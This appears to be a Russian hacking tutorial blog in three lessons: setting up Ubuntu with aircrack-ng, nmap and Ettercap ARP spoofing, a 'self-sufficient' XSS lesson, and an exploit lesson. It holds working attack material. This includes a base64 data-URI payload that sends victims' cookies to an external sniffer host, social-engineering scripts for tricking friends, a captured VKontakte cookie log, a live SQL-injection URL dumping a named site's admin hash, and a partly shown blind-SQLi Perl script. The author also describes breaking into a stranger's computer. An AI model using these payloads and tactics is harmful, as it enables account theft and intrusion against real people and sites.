И так ....после того как вы скачали VirtualBox в формате .deb и открыв его менеджером архивов он вам предложит его установить...нажав кнопку install вас ждёт разочарование.....так как вам нужны права root которых у вас пока нету....
Приобретаем права root
Чтобы разблокировать и поставить пароль на учётную запись root вам нужно
System--Администрирование--Пользователи и группы--нажать на root и потом на кнопку unlock(после чего вас попросят ввести ваш пароль(от вашей учётной записи))
После того как ввели пароль....вы можете изменять настройки учётной записи root (нам нужно поставить пароль).
Нажимаем на root и потом Properties -- Password (вводите ваш пароль на учётную запись 2 раза)--OK
всё. теперь мы можем выполнять команды от пользователя root

Возвращаемся к установке ....жмём install нас просят пароль от root.... вводим....и выполняем установку.....после того как мы установили перезагружаем компьютер и видим во вкладке Applications--Системные
Sun xVM VirtualBox это и есть наша программа.....теперь надо сделать чтобы наш пользователь мог пользоваться этой программой....
System--Администрирование--Пользователи и группы--Unlock--Manage Groups -- (ищите vboxusers)--Propetis--и ставите галку над вашим пользователем и над root....теперь можно приступать....

VirtualBox
Открываем Sun xVM VirtualBox и попробуем установить Windows XP
Создать--Далее--Даёте любое имя(у меня Xwindows) тип ОС Mirosoft Windows версия Windows XP--Далее(размер основной памяти можете оставить как есть)--Создать(Динамически расширяемый образ диска)ставите сколько вам нужно места под винду...жмёте Далее--Готово

После чего в основном окне появится Xwindows--жмём Свойства--CD/DVD-ROM--Подключить CD/DVD(далее если вы устанавливаете Windows с диска то
Физический CD/DVD-привод , а если с образа (iso) то Файл ISO-образа (и выбираете путь где находится этот образ)--ОК
Далее жмёте старт....и устанавливаете по такой же схеме как обычно....

После того как вы установили Windows и загрузитесь.....(попробуйте вставить флешку).....}=) и увидите ,что эту флешку Винда не видит....выполните эти действия и у вас всё получится...
http://jedi-linux.blogspot.com/2008/03/usb-virtualbox.html тут всё подробно описано....

Второй очень нужный нам момент это взаимосвязь Ubuntu и Windows , а именно....общяя папка(разшаренная папка)(для того чтобы мы могли быстро перекидываться файлами...)
Делается это очень просто....
1)Когда мы находимся в Windows жмём Ctrl+Home и выходим с полноэкранного режима--Машина--Полноэкранный режим
После чего у вас появятся в верхнем поле такие поля Машина, Устройства, Справка.
2)Жмём Устройства--Установить дополнения Гостевой ОС(устанавливаем эти дополнения и выключаем вирт машину...)//Кстати в этом пункте (Устройства вы можете в реальном времени подключать и отключать устройства от ОС)
3)Далее идём в вашу корневую папку...(на убунту) она еще называется Home Folder и создаём там папку под названием full (имя можете поменять если хотите)
4)Заходим в Sun xVM VirtualBox--Xwindows--Свойства--Общие папки--(нажимаем на папку с плюсиком)--Путь к папке(Другой) и выбираем путь до папки....у меня он получился такой /home/xakep9009/full--Ок
5)Загружаем Винду и вот что делаем...
Пуск--Выполнить-- net use x: vboxsvrfull <-имя папки -- Ok
После чего у вас появится "Сетевой диск"(тобишь папка которая будет работать как в Ubuntu так и в Windows)

VirtualBox мы с вами настроили....теперь как истинные Хакеры мы должны установить MySQL+PHP+Perl+phpMyadmin для наших опытов...(в Linux эта связка называется LAMP)

LAMP

Для того чтобы с лёгкостью установить сервер....(localhost) нам нужно иметь подключение к интернету....(поэтому в большей степени повезёт тем у кого ноутбуки...с настройкой WiFi им париться не придётся.....ну а если у вас декстоп....придётся помучиться и полазят по форумам....ибо у каждого собственные настройки...)

Уточняю (если вы всё еще не отошли от виртуальных машин) дальнейшие действия происходят в Ubuntu.

Открываем консоль(командная строка)....

Applications--Стандартные--Терминал

После чего в терминале пишем....

sudo apt-get install lamp-server^

Пишем пароль который вы ставили для пользователя root....и жмём Enter
Вот и всё! Теперь у нас работает PHP и MySQL (кстати perl в Ubuntu по умолчанию уже есть....)

Если вы еще не знаете(или не помните) что означают эти команды....то давайте разберём....так как они у вас будут встречаться очень часто
1)sudo -это команда для того чтобы выполнять действия от пользователя root
(если бы мы её не написали...нам бы выдали ошибку...что у нас мало прав на выполнение установки....эта команда всегда используется когда надо отредактировать или установить файлы.....)
2)apt-get install -эта команда для установки пакетов которые располагаются в репозитариях(в убунту по дефалту уже существует некоторое количество стандартных репозитариев....)
Чтобы было легче понять....приведу пример...
На сервакирепозитарии лежит файл....который называется mc...вам надо его установить...и вместо того чтобы лазить по интернету и искать его....вы можете набрать sudo apt-get install mc (после чего ваш комп начнёт рыскать по репозитариям и если он найдёт такой файл...он начнёт его устанавливать...(кстати установите эту программу она очень удобная и нужная....чтобы открыть её нужно в командной строке написать mc)
Добавлять репозитарии вы можете вручную для этого...System--Администрирование--Источники приложений--Third-Party Software--+Add

Ну и еще один пример для закрепления....
Когда вам надо будет отредактировать системный файл...или файл с повышенными правами
то делаем это так sudo gedit 'varsomefile.x'
Где gedit это стандартное приложение для редактирования текстовых документов...(по сути мы могли бы просто щёлкнуть два раза по somefile.x и начать его редактировать...но как только мы захотели бы его сохранить нас бы послали....на ошибку ^^.

Извините что пришлось к этому возвращаться....но это очень важный момент который вам еще много раз поможет...
и так....отлично localhost у нас работает....но не будем же мы работать с MySQL без PhpMyAdmin....

sudo apt-get install libapache2-mod-auth-mysql php5-mysql phpmyadmin

После чего у нас будет рабочий phpmyadmin проверить это можно набрав в браузере http://localhost/phpmyadmin
Сам сайт располагается в этой дерриктории /var/www

После этого как уважающий себя хакер мы должны установить пакет aircrack-ng (для взлома Wifi Сетей)
Взлом Wifi сетей я описывал тут http://forum.xakep.ru/m_1224792/mpage_6/key_/tm.htm
А установка делается очень просто....

sudo apt-get install aircrack-ng

Ну и естественно как мы можем узнать кого нам надо атаковать если у нас нету сканера сетей....nmap - это сканер локальных сетей устанавливается и используется очень легко....

sudo apt-get install nmap //Это установка

nmap 192.168.1.1-225 //Это использование

(после чего он начинает сканировать сеть на наличие подключённых компов и выводит IP этих компов....и открытые порты!)
Приведу пример....после того как я "позаимствовал" WiFi сеть....я первым делом начинаю сканирование на наличие подключённых компов....и для того чтобы определить на каком IP расположен роутер.....
Так вот просканировав сеть я обнаружил комп с открытым портом от Radmin`a я установил клиент Радмина и сидел получил полный доступ к этому компу....(вплоть до Рабочего стола)
Так же у nmap`a есть много настроек.....которые вы можете посмотреть через help. // nmap --help

Бывает так что времени нету или нет охоты.... на загрузку Виртуальной машины для единственной программы....допустим utorrent.....
Для этого случая у нас есть замечательная вещь как Wine(оно же вино)

Wine
Это мини эмулятор Windows XP под Linux .....
(скорее сказать что она эмулирует файловую систему)

sudo apt-get install wine

После чего у вас в Applications появится раздел Wine.....
Теперь для примера скачайте WinRAR и установите его....(это пожалуй первая нужная программа(имеется ввиду расширение) которая не потдерживается "менеджером архивов")

Ну и хакерскую программу которую должен иметь при себе Cracker это отладчик ollydbg даже если вы не знаете Ассемблер она всегда должна быть при вас....так как всегда есть вероятность что вы встретите Криса Касперски и он вам покажет пару трюков ^^
http://www.ollydbg.de/version2.html

Единственный недостаток из-за которого мы всё еще привязаны к Windows это то что Wine в некоторых случаях не может установить (корректно) программу.//Это в том случае если программа глобальная....как Word, Photoshop итд....хотя программа развивается....

Следующий и очень важный для нас инструмент будет Ettercap который мы можем установить из стандартного набора программ.....(кстати обратите внимание на него....там очень много полезных программ которые мы можем скачать)

Applications--УстановкаУдаление--Интернет(и тут ищем программу Ettercap)--ставим галку напротив неё--Apply Changes

После этого эта программа будет установлена и мы сможем её найти в

Applications--Интернет

Запускаем её и с нас требуют пароль администратора....так как эта программа связанна с WiFi карточками.....

Ettercap

Эта программа производит ARP spoofing благодаря которому мы можем "ловить" пароли пролетающие в сети.....
Подробнее о ARP spoofing можно прочесть тут
http://ru.wikipedia.org/wiki/ARP-spoofing

А если коротко об этой атаке....то наш компьютер притворяется роутером....и все пакеты посылаются нам....после чего мы их декодируем.....(фильтруем то что нам нужно и сохраняем у себя...)и в это же время перенаправляем эти пакеты настоящему роутеру....(чтобы жертва не заметила подвоха)

именно эти действия выполняет Ettercap....
Теперь давайте рассмотрим как это можно сделать...
Открываем Ettercap(в графическом виде) и настраиваем его на атаку....

Sniff--Unifide Sniffing(выбираем интерфейс который подключен к сети которую будем атаковать , о как закрутил =D)
//p.s узнать какие у вас вообще есть интерфейсы можно набрав в консоли airmon-ng
У меня этот интерфейс eth1--ОК

Теперь нам нужно найти роутер и машины которые нам надо снифать.....

Hosts--Scan for hosts
Теперь открываем лист хостов....
Hosts--Hosts list
Роутеры обычно располагаются на таких адресах 192.16.1.1 или 192.168.1.254
или если админ продвинутый и поставил роутер на какой-то другой IP мы можем всегда воспользоваться nmap и вычислить это.....(если мы увидим что у кого то открыт 80 порт -порт http сервера...)
И так определили роутер....в моём случае он располагается 192.168.1.1 и добавляем его в Target 1 Все остальные машины добавляем в Target 2

Ну а теперь когда мы навели прицел на атакующих надо выбрать что нам нужно от них(снифаннье паролей или может чтобы не доходили до них пакеты...итд)
Делается это так...
Plugins--Manage the Plugins(и тут мы выбираем вид атаки....)
для того чтобы перехватывать пароли выбираем плагин pptp_pap
Жмём два раза на него....и он включается.....

Activating pptp_pap plugin...
pptp_pap: plugin running...

Но мы еще не начали атаку....теперь чтобы начать жмём
Mitm--ARP Poisoning(и ставим галку Sniff remote connections)--ok

Ну и наконец Start--Start Sniffing
Всё теперь сидим и ждём....наши пароли....кстати так же вы можете следить за пользователем....(куда он переходит по ссылкам) для этого вам надо включить еще один плагин remote_browser 1.2
Единственный недостаток этого плагина ...это если ссылка слишком большая то Ettercap сам делает своё окно на весь экран....и прикрыть его нельзя....

Ну и естественно имея Ubuntu как я могу не рассказать о такой фишке как
Compiz Fusion lcon
Это программа для улучшения твоего рабочего стола....
Но слово улучшение.....тут не уместно.....
Твой рабочий стол становится очень удобным и красивым....
В этот пакет входит такая фишка как 3D Descktop (тобишь куб)....и еще много много разных эффектов....
посмотреть которые вы можете тут
http://www.youtube.com/watch?v=ZxfSwzhSn1c&feature=related
Скачать эту программу можно с Applications--УстановкаУдаление--(В поиске во всех программах вбиваете Compiz)

Metasploit framework

Ну и наконец самая известная хакерская тулза.....это МЕТАСПЛОЙТ
Метасплойт представляет из себя огромную базу данных эксплойтов....которые, междупрочим можно запускать....указав всего несколько параметров.....этот инструмент я буду рассматривать отдельно....
Пока вам надо его установить....ну и при желании самим покапаться в нём.....

В терминале набираем.....
sudo apt-get install ruby libruby rdoc
apt-get install libyaml-ruby
apt-get install libzlib-ruby
apt-get install libopenssl-ruby
apt-get install libdl-ruby
apt-get install libreadline-ruby
apt-get install libiconv-ruby
apt-get install rubygems *
apt-get install libgtk2-ruby libglade2-ruby

Естественно это каждая команда по отдельности.....
После чего вам надо скачать сам пакет.....
http://metasploit.com/framework/downloader/?id=framework-3.2.tar.gz
Разархивировать..... и всё.... Metasploit установлен....

Ну и совсем уж напоследок.....раскажу парочку фишек....для новичков в Linux
1)Команда su в терминали означает что ты хочешь все остальные операции(в терминале) производить от пользователя root
как пример это делается для того чтобы несколько раз не писать sudo....
2)Команда top это просмотр выполнения процессов....(аналог в Windows Ctrl+alt+del)
3)Команда kill (номер PID) это убивает процесс...допустим firefox заглючила....и не хочет отключаться....
открываешь командную строку....в ней пишешь top (там ищешь PID firefox`a) (останавливаешь команду top....нажав ctrl+C //кстати так можно делать со всеми командави....допустим ping точно так же можно остановить...)
И узнав номер PID firefox`a который равнялся 39994 мы убиваем этот процесс
kill 39994 .
4)Команда cd (передвижение по деррикториям)
5)Команда chmod служит для раставления прав.....
допустим какой то файл или папка доступна только root...а мы хотим сделать егоеё доступным для всех....(записи и чтения)

sudo chmod 777 '/var/lol/somefile_or_dir'

6)Команда rm (remove) переводится как удаление.....что бы это могло быть? =)
Пример
rm '/var/lol/somefile.x'

7)Команда history используется для просмотра всего...что вбивалось в командную строку....ох весёлая история была у меня с этой командой...

8)Удаление программы
Пример: sudo apt-get remove aircrack-ng

Помните...если вы не знаете что означает та или иная команда ....вы можете всегда посомтреть.....
sudo --help
rm --help
ping --help
итд......
иногда может быть так
man man
man help
man ping ......

Вывод

И так мы с вами узнали
1)Какой инструментарий используется при нападении.
2)Поняли на сколько лёгок Linux в изучении....и насколько легко устанавливать различные известные пакеты...
3)УзналиПовторили несколько команд из терминала...
4)Поняли как работают репозитарии
5)Рассмотрели такой вид атаки как ARP spoofing
6)И наконец собрали себе боеспособную ОС.

06.01.2010 17:32

XSS II ВОССТАНИЕ САМОДОСТАТОЧНЫХ

XSS II ВОССТАНИЕ САМОДОСТАТОЧНЫХ.

Сегодня я хочу рассказать вам о очень мало используемой уязвимости...
но при этом не менее опасной...эта уязвимость называется самодостаточные XSS.
Называется эта уязвимость самодостаточной потому , что не требует наличия уязвимости на ресурсе...
Сразу сделаю примечание...эта уязвимость не работает в Internet Explorer 6 и 7ой версии...но это не проблемма в наши дни...так как ими пользуются всё меньше и меньше людей...
Более подробно об этой уязвимости вы можете прочитать здесь http://www.securitylab.ru/analytics/274302.php // Это чтобы не повторяться.

Всё что нужно , чтобы эта уязвимость заработала...так это чтобы человек(атакуемый) перешёл по ссылке(с того сайта с которого мы хотим стащить Cookies) вот такого вида....
[link=http://forum.xakep.ru/m_1224792/mpage_28/data:text/html;base64,PHNjcmlwdD4gYWxlcnQoIlhha2VwOTAwOV9SdWxseiIpOyA8L3NjcmlwdD4=]data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=[/link]
Конечно вы скажете , что никто не перейдёт по такой подозрительной ссылке...
Но ведь мы можем всегда спрятать её.....и вот несколько способов.
1)Прячем ссылку нашим любимым способом через тэг
Халявные ICQ
//На форумах это используется при помощи тэгов [link ] [/link] и [url] [/url] алгоритм тот же...
2)Прячем ссылку в картинке!

На форумах это делается при помощи всё тех же тэгов [url="Наша_ссылка"][IMG src="image.jpg"][/url]

Вот собственно пару примеров....как можно замаскировать наши "Ядовитые" ссылки....
Но! бывают и случаи когда вы хотите попасть на почту своей девушки....или знакомого друга....

В этих случаях прятать ссылку необязательно....главное применить СИ (социальная инженерия)....
Вот пример как я "ввожу в доверие" моих друзейподругзнакомых.
Пишу:
---------------------------------------------------------------------------------------------------------------------------
Привет ...посмотри прикол....который я нашёл ....зайди на сайт (сайт с которого мне надо украсть куккисы, допустим mail.ru) и вставь в адресную строку (там где ты печатаешь ссылки) вот это :

javasсriрt:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=1024; y4=768; x5=1024; y5=768; DI=document.images; DIL=DI.length; function A(){for(i=0; i И нажми энтор.
------------------------------------------------------------------------------------------------------------------------------

Когда онаон вставляет в адресную строку и жмёт энтор этот код....онаон видит летающие картинки с этого сайта...что обычных юзеров приводит в восторг....и под этим чувством мы "впихиваем" ссылку с нашим вредным кодом.
Пример:

data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=

И когда жертва говорит, что у неё пустая страница...мы с удивлением говорим...
"Вот досада видимо у тебя браузер не поддерживает этого прикола...=("
А сами идём на сниффер....на котором у нас уже лежат Кукисы жертвы.

Теперь я думаю тактика вам становиться понятна...
Ну а чтобы вы на практике поняли как она работает.....и как она опасна....(эта уязвимость)
Приведу примеры использования...на "скромных ресурсах РУ нета"

1)Угоняем на время mail.ru

И так...нам надо спрятать нашу длинную ссылку в письме....
Но нажав на расширенный формат---Добавить ссылку на сайт или страницу интернет и вставляя нашу ссылку...мы видим облом...ибо нам пишут ошибку "Неправильный формат ссылки"

Мы бы расстроились и пошли плакать...если бы мы небыли хакерами =)
Но так как мы хакеры...мы догадались.....раз у нас не получается добавить скрытую ссылку через "службы" сайта....то сделаем через наши "службы"...

А именно.....создаём html страничку вот с таким кодом.
------------------------------------------------------------------------------------------------------------------------------------------

Ссылка!=)
оdу>

-------------------------------------------------------------------------------------------------------------------------------------------

Сохраняем и открываем в нашем браузере.....и видим нашу скрытую ссылку....вот в таком виде....
Ссылка!=) копируем этот текст....и вставляем в наше письмо.....как вы видите...к нам ни единых претензий не предъявили....
Вот мы и спрятали нашу длинную ссылку.....

Тоже самое можно проделать с картинкой...!!!а это гораздо эффективнее.....скопируйте этот html код , сохраните и откройте...потом поймёте почему эффективнее
---------------------------------------------------------------------------------------------------------------------------------

http://www.ljplus.ru/img3/p/r/prosto_irishka/IMGP1599-.jpg>
оdу>

----------------------------------------------------------------------------------------------------------------------------------

2)Угоняем на время yandex.ru

Что касается Яндекса...
Ничего умнее чем редирект я не нашёл....
Редирект - это перенаправление с одного сайта на другой.....
и вот что у меня получилось....
http://mail.yandex.ru/r?url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=

Но это не единственный способ....поищите другие....допустим с картинками...я не пробовал....уверен у вас получиться найти больше чем я нашёл =).

3)Угоняем на время Rambler.ru
Rambler на удивление оказался тоже стоикий....
Могу вам сказать...что сначала я искал редиректы.....собственно я нашёл один...
http://www.rambler.ru/click?from=mail&_URL=[наш_любой_сайт]
Вы можете использовать её для перенаправления жертвы на ваш фейк...о котором я писал ранее....
хотя это не единственный редирект...который я нашёл....
http://www.rambler.ru/click?from=mltopline&_URL=http://наш_сайт.ru/
Но эти редиректы ...не связанны с сайтом rambler.ru....вы это можете обнаружить из заголовка вылетающей ошибки....там где атака проходит удачно ...вылетает окно с титлом от сайта...чьи кукисы мы хотим получиьт...

После 10 мин копания я ничего не нашёл....и утешил себя...что даже опытные пользователи не смогли бы заметить наглый редирект на фейковскую страничку....

А теперь вы можете задать мне вопрос.....зачем нам дурацкая ошибка которая вылетает с твоим ником?
Всё просто....это как и в стандартном XSS мы сначало проверяли на наличие уязвимостей....а теперь можем переделать в настоящую ядовитую ссылку....и делается это просто....

На прошлих уроках я вас не просто так...познакомил с одним из видов шифрования под названием base64 .
А самодостаточные XSS и основаны на том , что закодированы в этот вид шифрования....чтобы вам стало яснее приведу пример.

Вот я писал.....
data:text/html;base64,PHNjcmlwdD5hbGVydCgnWGFrZXA5MDA5X1J1bGx6Jyk8L3NjcmlwdD4=
где выдиленая часть это чистая кодировка base64 не верите....разкодируйте тут http://www.motobit.com/util/base64-decoder-encoder.asp
и вы получите alert('Xakep9009_Rullz')сriрt>
Узнаёте стандартную XSS?

А теперь что мешает нам "впихнуть" вместо "Шуточного" кода "Ядовитый".
Допустим такой....
img = new Image(); img.src = "http://old.antichat.ru/cgi-bin/s.jpg?"+document.cookie;сriрt>
Ничего...
Кодируем...в base64 и получаем на выходе:

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0
LnJ1L2NnaS1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

И дальше делаем всё по схеме =)

А теперь давайте представим , что мы хотим угнать контакт.

Да....именно тот который Vkontakte.ru

Делается это очень легко.....
Входим в доверие к нашей жертве....просим вставить в адресную строку

data:text/html;base64,PHNjcmlwdD5pbWcgPSBuZXcgSW1hZ2UoKTsgaW1nLnNyYyA9ICJodHRwOi8vb2xkLmFudGljaGF0LnJ1L2NnaS1iaW4vcy5qcGc/Iitkb2N1bWVudC5jb29raWU7PC9zY3JpcHQ+

А сами в это время сидим и ждём на логе сниффера....
http://old.antichat.ru/sniff/log.php

Обновляем лог ...и видим что-то примерно такое....
[Wed Jan 14 23:33:31 2009] IP=81.158.225.252 SITE=
REFERER=
QUERY=remixlang=0; remixchk=5; remixclosed_tabs=0; remixautobookmark=6; remixgroup_closed_tabs=0; remixmid=2520472; remixemail=Xakep9009@Gmail.com; remixpass=cb570d109f5e4583f43f7a551e9e6db9; remixsid=e0b5e7a938255698a0afddcd64351293d527dfb1eca1d2f0c7d78c55
AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5

где значение remixemail Это логин (Xakep9009@gmail.com) , а remixpass наш пароль....зашифрованный в md5 .....который вы можете попытаться разшифровать... тут http://passcracking.com/index.php ну а remixid это номер идентификатор...контакта который вы ломанули....

Ну и даже если у вас не получилось ломануть вы всегда можете посидеть с этой странички....при помощи замены Cookies...про которую я тоже писал...в первом уроке про XSS.
Вывод
1)Мы узнали про очень забытую уязвимость...и которая от этого становится в тройне опасной.
2)Мы узнали, что даже если у нас есть недосигаемые сайты такие как Gmail или Vkontakte мы можем всегда обмануть систему.
3)Вспомнили про методы шифрования md5 и base64
4)Научились быть Самодостаточными и использовать это
5)Узнали и научились обходить ограничения сайта подручными средствами (Пример с Ctrl+C и Ctrl+v в mail).
7)Еще раз убедились что СИ мощнейшее оружие Хакера(Пример с летающими картинками)
6)И наконец осознали , что XSS это мега уязвимость!

05.01.2010 21:51

Эксплойты

Эксплойты

Exploit (Эксплойт) - от Английского слова Эксплуатировать, вообще эксплойт это найденная уязвимость которая очень хорошо описана её автором....то есть как правило автор эксплойта пишет скрипт...который нам нужно чуть чуть подредактировать....чтобы мы могли подставить его под свой случай....(Но это определение не подходит под все эксплойты)....видов эксплойтов очень много...и я постараюсь рассмотреть наиболее актуальные для нас. //У нас будет практика и вы 100% поймёте что такое Эксплойты.

Эксплойты используются для взломов сайтов...для получения удалённого доступа к компьютеру через (уязвимую программупроцесс выполняемый на компьютересервере атакуемого) или для полного уничтожения цели(компьютерасайта).

И в этом Уроке я вас больше буду знакомить с Эксплойтами для сайтов.

Теперь я вам открываю секрет....почему быть взломщиком сайтов так не легко...
И почему Хакеры не всегда могут взломать сайты Фашистов.....Геев или Секты.
Всё дело в том...что Никто из перечисленных (ну наверное кроме геев не делают сами себе сайты....)
В том плане ....что они используют движки.

И тут мы знакомимся с понятием движки (CMS) - это система управления содержимым.
более подробно вы можете прочесть [link=http://ru.wikipedia.org/wiki/%D0%A1%D0%B8%D1%81%D1%82%D0%B5%D0%BC%D0%B0_%D1%83%D0%BF%D1%80%D0%B0%D0%B2%D0%BB%D0%B5%D0%BD%D0%B8%D1%8F_%D1%81%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B8%D0%BC%D1%8B%D0%BC]тут[/link] <-

То есть движки....это основа сайта....а всё содержимое уже заполняет её владелец.
А как вы понимаете по началу у движков...всё время находят баги....уязвимости...но как вы понимаете эти движки развиваются...и все свои недочёты закрывают.....образно говоря....кого легче прочитать .....роман Дарьи Данцовой...или Войну и мир?....как вы понимаете это не сопоставимые вещи....
Так и тут кого легче взломать? того кто написал свой движок....или использует чужой...испытанный годами....
(поверьте начинающего программиста легче ломануть, по себе знаю, по началу о безопасности никакой речи не идёт....первым делом идёт речь о функциональности...)

Сейчас я покажу вам примеры самых популярных движков...которые "испытаны годами" и очень часто используются.

1) Joomla -> http://www.seo-joomla.net
2) Datalife engine -> http://www.nullsoft.cc
3) WordPress -> http://maxsite.org/
4) Ucoz -> http://pokemon-ukraine.ucoz.ua/index/0-22

-----------------------------------------------------------------------------------------------------------------------------------
// Это были движки под сайты.....но не всегда движки предоставляют форумы...и вот популярные движки под форумы.

1) phpbb -> http://www.volchat.ru/forum
2) vBulletin -> http://forumishka.net
3) Invision Power Board (IPB) -> http://forum.exler.ru

//Естественно это отнють не все популярные движки...но нам для примера достаточно.=)

Ну вот мы и познакомились с понятием движки...как вы видите...сайты использующие одинаковые движки ничем не отличаются(по дизайну) кроме картинок...

Вот несколько способов как я определяю какой движок(и иногда версию движка) использует сайт.
1)Первым делом всегда смотрю на конец страницы.
"Создателям" сайтафорума иногда бывает даже лень стереть версию и название движка как допустим в примере с http://forumishka.net/ открываем и смотрим в самый конец страницы ....и видим vBulletin® Version 3.7.1 вот и видим...версию и номер движка.....

2)Потом смотрю на дизайн и так же на логотип(при адресной строке...там картинка маленькая это и есть логотип от форумасайта)
когда немного наберёте опыта, а это будет очень скоро...вы сможете одним взглядом сказать на каком движке расположен тот или иной сайт.

3)После этого я смотрю на исходный код строницы....
Как в примере с http://www.nullsoft.cc ....в мета теге лежит вот что "DataLife Engine Nulled by M.I.D-Team"
Опять же опытные Хакеры могут по исходному коду определить не только название, но и версию! этого движка...что очень важно...(версия)

Теперь вы знаете почему не всё так просто...при взломе фашистских сайтов....если бы они делали движок сами.....то у них бы сайтов вообще не существовало...

Но где плюсы там и минусы....
Так как этот движок может использовать любой проходимец....хакеры этим пользуются и ставят себе этот движок "для тест драйва"(проверки на прочность). И если этот движок не прошёл эту проверку....отсюда появляется Эксплойт! о котором мы сейчас поговорим в плотную!

Самые популярные хакерские сайты где выкладывают самые свежие Эксплойты являются.
http://milw0rm.com
http://www.securitylab.ru

Так же есть поисковик эксплойтов.

http://madnet.name/tools/bugsearch/

Теперь мы знаем где взять эксплойты...
Давайте познакомимся какие виды эксплойтов бывают.

Программынепроцессные эксплойты (эти эксплойты могут осуществляться при определённых условиях, допустим на удалённой машине установлена та или иная программа) проще говоря эти эксплойты написаны для определённых программпроцессов.
//(сюда входят драйверы,установленные программы)

Так же отдельно можно выделить Эксплойты для Браузеров.
Эти эксплойты используются в таких целях
1)Чтобы браузер самостоятельно скачал открыл и запустил программу.
2)Для запудривание мозгов...в статье про фейк я приводил пример ....там где нужно было спрятать ссылку....(чтобы при наведении на ссылку в левом нижнем окне отображалась фейковская ссылка(неправильная))
3)Для отказа браузера в работе.....(чтобы он вылетал...или писал критические ошибки)
4)Так же чтобы ваш браузер перед тем как вы попали на нормальную (вашу ссылку) он переходил по еще 100 штукам))))
Пример: Вы заразили свой браузер...и теперь когда вы в адресной строке набираете google.com он переходит по sex.com , nosex.com , nogetro.com итд. и только потом на google.com.
Есть еще много разных видов эксплойтов ...под браузеры...под разные цели...но я назвал основные.

Эксплойты под Операционные Системы.
Эти эксплойты в основном используются для получения удалённого доступа...поднятия прав до привелигерованного пользователя (Администраторroot) или отказа в обслуживании//Смерть системы...

И наконец эксплойты под WEB
Как я уже сказал....сюда входят уязвимости движков.

И в этой категории есть несколько видов(подкатегорий) эксплойтов.

1)XSS
2)XSRF
3)SQL inj
4)php include

Про два из них...вы уже должны хорошо знать....
А вот про 3ий и 4 пункт я вам пока не рассказывал...
--------------------------------------------------------------------------------------------------------------------------------------

После долгой Теории без которой вы бы не обошлись....
Переходим к практике

Рассмотрим на примере эксплойта -> XSS SQL inj
http://milw0rm.com/exploits/7672 <-вот эксплойт

Восновном ХSS уязвимости рассматриваются в таком виде...
Exploit(XSS):profile.php?user_id=29&auction_id=9[XssCode] Что означает [Exploit(XSS)] - это всё что идёт до вот этого пути profile.php?user_id=29&auction_id=9

А эта часть [XssCode] это наш ядовитый код))))который мы используем....

В этом эксплойте автор нам любезно привёл пример....
http://www.phpauctions.info/demo/profile.php?user_id=29&auction_id=9alertсriрt>(1);
Но это бывает редко....(эксплойты с примерами)

Как мы видим ...в этом эксплойте описано несколько уязвмостей .....и приведён пример с SQL inj

Вот пример.....
[link=http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat%28id,char%2858%29,username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--]http://www.phpauctions.info/demo/profile.php?user_id=-29%20union%20select%201,concat(id,char(58),username,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20PHPAUCTION_adminusers--[/link]

перейдя по ссылке вы найдете вот что....
10:admin:0cc1e6f7500e16099a4b17534136f1e1
Это Логин и Хеш от пароля....этого сайта....
admin - это логин , а через точку с запятой расположен хеш.... 0cc1e6f7500e16099a4b17534136f1e1
Этот хешь(масса) закодирован в md5 кодировку....про которую вы можете более подробно узнать тут
http://ru.wikipedia.org/wiki/MD5

Могу сказать...что md5 это моя головная боль))) хеш это предпоследняя стадия взлома.... =) до логина и пароля..админа....
то есть разкодировать хеш....то у нас будет админка сайта....

Сделать это в большинстве случаев можно при помощи online md5 декодеров....вот мои самые любимые
http://gdataonline.com/seekhash.php
https://hashcracking.info/index.php
http://passcracking.com/index.php

-----------------------------------------------------------------------------------------------------------------------------------
Но к сожалению они не всегда дают результат.....поэтому есть еще один вариант ....это скачать программу BarsWF с официального сайта [link=http://3.14.by/ru/md5%C2%A0]http://3.14.by/ru/md5 [/link] и брутить пароль при помощи этой программы....(на сайте дана инструкция по применению)
//Отдельное спасибо моему другу про то, что он мне о этой проге рассказал.

Так-с поехали дальше....

В этом же эксплойте вы видите...
"Perl Exploit:"
и какой то непонятный скрипт....

Успокойтесь всё не так страшно как вам кажется....=)))
Знакомьтесь! это Перловый скрипт!
Он выполняет такую же функцию как приведённая мною выше SQL inj ....

Но только делает это при помощи скрипта(суть работы скрипта заключается в том....что он выдерает с Базы Данных по символу и мы получаем хеш....)

И так....чтобы запустить скрипт...нам нужно иметь Perl интерпретатор....
Если у вас он есть....это очень хорошо))) А если нету....то вам надо установить его вот отсюда
http://soft.softodrom.ru/scr/get.php?id=478 ActivePerl -> это интерпретатор под Windows

И так... Perl это отличный язык программирования....который не требует компиляци...!
И после того как вы установили ActivePerl ....вы можете пользоваться перловыми эксплойтами!(эксплойты написанные на перл)
Отличительная черна языка Perl от всех остальных....это простота....
Все перловые скрипты начинаются вот с этого....
#!/usr/bin/perl это как определитель...где находится сам интерпретатор....(но вы не пугайтесь....сейчас всё поймете...)

Значит нам нужно чтобы у нас заработал перловый скрипт...
1)Создаём любое_имя.txt файл.
2)Записываем туда скрипт.....(копируем)

-----------------------------------------------------------------------------------------------------------------------------
#!/usr/bin/perl -w

use strict;

use LWP::Simple;

my $a;

my $host = "http://www.phpauctions.info/demo/profile.php?user_id=";
#Тут Может писаться любой сайт...потдерживающи этот скрипт....только учтите
#Что пишится он доконца...тоесть profile.php?user_id= досюда)))

my @chars = (48..57, 97..102);

for my $i(1..32) {

foreach my $ord(@chars) {

$a =
get($host."1+and+ascii(substring((select+password+from+PHPAUCTION_adminusers+where+id=10),$i,1))=$ord--");

